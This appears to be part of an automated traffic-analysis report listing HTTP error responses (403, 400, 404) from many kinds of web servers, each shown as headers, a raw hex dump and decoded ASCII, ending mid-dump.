Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 18 Mar 2024 09:00:00 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 31 38 20 4d 61 72 20 32 30 32 34 20 30 39 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 32 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>HTTP/1.1 400 Bad RequestDate: Mon, 18 Mar 2024 09:00:00 GMTServer: ApacheContent-Length: 226Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenTransfer-Encoding: chunkedServer: Microsoft-HTTPAPI/2.0Date: Mon, 18 Mar 2024 09:00:05 GMTData Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon Mar 18 14:00:00 2024Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon Mar 18 14:00:00 2024Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Mon, 18 Mar 2024 08:59:05 GMTContent-Length: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 06:00:00 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon Mar 18 14:00:00 2024Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: awselb/2.0Date: Mon, 18 Mar 2024 09:00:02 GMTContent-Type: text/plain; charset=utf-8Content-Length: 0Connection: keep-alive
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: awselb/2.0Date: Mon, 18 Mar 2024 09:00:03 GMTContent-Type: text/plain; charset=utf-8Content-Length: 0Connection: keep-alive
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlCache-Control: private, no-cache, max-age=0Pragma: no-cacheDate: Mon, 18 Mar 2024 09:00:05 GMTServer: LiteSpeedContent-Encoding: gzipVary: Accept-EncodingTransfer-Encoding: chunkedConnection: closeData Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a Data Ascii: a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 09:00:05 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.1Date: Mon, 18 Mar 2024 09:00:05 GMTContent-Type: text/htmlContent-Length: 153Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 35 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.25.1</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 09:00:06 GMTContent-Type: text/htmlContent-Length: 520Connection: keep-aliveETag: "65b61ea9-208"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 09 62 6f 64 79 7b 0d 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 34 34 3b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0d 0a 09 7d 0d 0a 09 68 33 7b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 36 30 70 78 3b 0d 0a 09 09 63 6f 6c 6f 72 3a 23 65 65 65 3b 0d 0a 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 30 70 78 3b 0d 0a 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0d 0a 09 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 33 3e 34 30 34 e9 94 9b e5 b1 be e5 81 8d e7 92 87 e9 94 8b e7 9c b0 e9 90 a8 e5 8b ac e6 9e 83 e6 b5 a0 e6 9c b5 e7 ac 89 e7 80 9b e6 a8 ba e6 b9 aa 21 3c 2f 68 33 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon Mar 18 19:00:06 2024Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon Mar 18 19:00:06 2024Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCONNECTION: closeCONTENT-LENGTH: 48CONTENT-TYPE: text/htmlData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><body><h1>404 Not Found</h1></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 18 Mar 2024 09:00:08 GMTServer: Apache/2.4.58 (FreeBSD) OpenSSL/1.1.1w-freebsd mpm-itk/2.4.7-04 PHP/8.2.14Content-Length: 199Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 31 38 20 4d 61 72 20 32 30 32 34 20 30 39 3a 30 30 3a 30 38 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 46 72 65 65 42 53 44 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 77 2d 66 72 65 65 62 73 64 20 6d 70 6d 2d 69 74 6b 2f 32 2e 34 2e 37 2d 30 34 20 50 48 50 2f 38 2e 32 2e 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 32 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>HTTP/1.1 400 Bad RequestDate: Mon, 18 Mar 2024 09:00:08 GMTServer: Apache/2.4.58 (FreeBSD) OpenSSL/1.1.1w-freebsd mpm-itk/2.4.7-04 PHP/8.2.14Content-Length: 226Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.8.1Date: Mon, 18 Mar 2024 09:00:09 GMTContent-Type: text/htmlContent-Length: 168Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.8.1</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: David-WebBox/12.00a (1321)Transfer-Encoding: chunkedCache-Control: no-cacheConnection: closeContent-Type: text/html
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 09:18:46 GMTServer: Apache/2.2.22 (Debian)Vary: Accept-EncodingContent-Encoding: gzipContent-Length: 242Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 6b c3 30 0c 85 ef f9 15 5a 4f db a1 56 12 0a db c1 18 da 26 65 85 ac 0b 9b 3b d8 d1 a9 b5 c6 d0 d9 99 ed ae ec df cf 49 19 8c 07 02 49 ef 13 4f fc a6 7a 5e cb f7 b6 86 47 f9 d4 40 bb 5f 35 db 35 cc e6 88 db 5a 6e 10 2b 59 5d 37 25 cb 11 eb dd 4c 64 bc 8f 9f 27 c1 7b 52 3a 35 d1 c4 13 89 45 be 80 9d 8b b0 71 67 ab 39 5e 87 19 c7 c9 c4 3b a7 7f 46 ae 10 ff 3c a9 cb f8 20 64 4f e0 e9 eb 4c 21 92 86 fd 4b 03 78 38 9a 79 67 2c be 19 ba 34 ee c8 54 18 e0 a2 02 d8 04 7f 8c 30 38 0b b1 37 01 02 f9 6f f2 8c e3 30 9e f7 a9 28 ad 3d 85 20 96 83 3a f4 84 25 4b 2a e1 b6 a2 ce 28 7b 07 af 13 00 2a 42 51 de b3 3c a9 80 d6 f9 08 0f 39 c7 3f 36 e5 9e 12 a7 8c e3 a7 d9 2f 67 ca ef 29 24 01 00 00 Data Ascii: MAk0ZOV&e;IIOz^G@_55Zn+Y]7%Ld'{R:5Eqg9^;F< dOL!Kx8yg,4T087o0(= :%K({BQ<9?6/g)$
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 09:00:09 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 08:24:58 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Mon, 18 Mar 2024 09:00:10 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Robots-Tag: noindex, nofollow, nosnippet, noarchiveContent-Encoding: gzipData Raw: 37 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 42 df 50 cf c8 48 cf 10 59 89 3e cc 50 7d a8 83 00 97 8d 7f bd 99 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 71(HML),I310Q/Qp/K&T";Ct@}4l"(//=3BPHY>P}0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Mon, 18 Mar 2024 09:00:10 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Robots-Tag: noindex, nofollow, nosnippet, noarchiveContent-Encoding: gzipData Raw: 37 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 42 df 50 cf c8 48 cf 10 59 89 3e cc 50 7d a8 83 00 97 8d 7f bd 99 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 71(HML),I310Q/Qp/K&T";Ct@}4l"(//=3BPHY>P}0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Mon, 18 Mar 2024 09:00:10 GMTContent-Type: text/htmlContent-Length: 3650Connection: keep-aliveETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f
